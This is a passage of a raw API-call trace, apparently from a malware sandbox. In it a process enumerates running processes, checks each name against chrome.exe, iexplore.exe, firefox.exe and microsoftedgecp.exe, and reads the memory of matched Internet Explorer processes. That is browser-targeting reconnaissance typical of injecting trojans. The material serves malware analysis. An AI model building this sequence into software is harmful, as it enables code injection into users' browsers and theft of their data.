	[0253.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.893] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0253.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.893] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.893] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0253.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.894] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.894] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0253.895] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xaa70
	[0253.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.895] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0253.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.895] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.896] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0253.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.896] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.897] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0253.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xaa74
	[0253.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.898] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0253.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.898] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.899] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0253.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.899] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.900] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0253.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xaa78
	[0253.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.901] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0253.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.901] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.901] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0253.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.901] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.902] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0253.902] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xaa7c
	[0253.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.903] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0253.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.903] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.903] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0253.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.903] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.904] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0253.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xaa80
	[0253.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.905] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0253.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.905] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.906] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0253.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.907] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.907] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0253.908] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xaa84
	[0253.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.908] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0253.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.908] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.909] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0253.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.910] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.910] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0253.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xaa88
	[0253.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.911] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0253.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.912] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.912] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0253.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.913] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.913] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0253.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xaa8c
	[0253.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.914] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0253.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.915] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.915] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0253.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.916] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.917] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0253.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xaa90
	[0253.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.918] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0253.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.918] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.919] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0253.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.919] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.919] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0253.920] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xaa94
	[0253.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.920] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0253.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.921] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0253.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.921] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0253.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.921] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.922] NtQueryInformationProcess (in: ProcessHandle=0xaa94, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0253.922] ReadProcessMemory (in: hProcess=0xaa94, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0253.922] ReadProcessMemory (in: hProcess=0xaa94, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0253.923] ReadProcessMemory (in: hProcess=0xaa94, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0253.923] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0253.923] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0253.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xaa98
	[0253.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.924] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0253.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.924] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0253.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.924] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0253.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.925] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.925] NtQueryInformationProcess (in: ProcessHandle=0xaa98, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0253.925] ReadProcessMemory (in: hProcess=0xaa98, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0253.925] ReadProcessMemory (in: hProcess=0xaa98, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0253.925] ReadProcessMemory (in: hProcess=0xaa98, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0253.925] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0253.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0253.926] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xaa9c
	[0253.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.927] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0253.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.927] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.927] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0253.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.928] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.928] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0253.929] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xaaa0
	[0253.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.929] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0253.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.929] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.930] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0253.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.930] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.930] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xaaa4
	[0253.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.931] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.931] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.932] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.932] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.932] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.933] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.934] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xaaa8
	[0253.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.934] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.935] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.935] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.935] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.936] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xaaac
	[0253.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.936] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.937] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.937] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.938] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.938] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0253.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xaab0
	[0253.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.939] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0253.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.939] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.940] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0253.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.940] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.940] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xaab4
	[0253.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.941] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.942] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.942] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.942] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.943] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xaab8
	[0253.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.944] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.944] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.944] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.945] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.945] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0253.946] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xaabc
	[0253.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.946] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0253.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.946] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.946] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0253.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.947] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.947] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0253.948] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xaac0
	[0253.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.948] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.948] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.949] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.949] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.949] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0253.950] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xaac4
	[0253.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.950] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0253.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.950] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.951] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
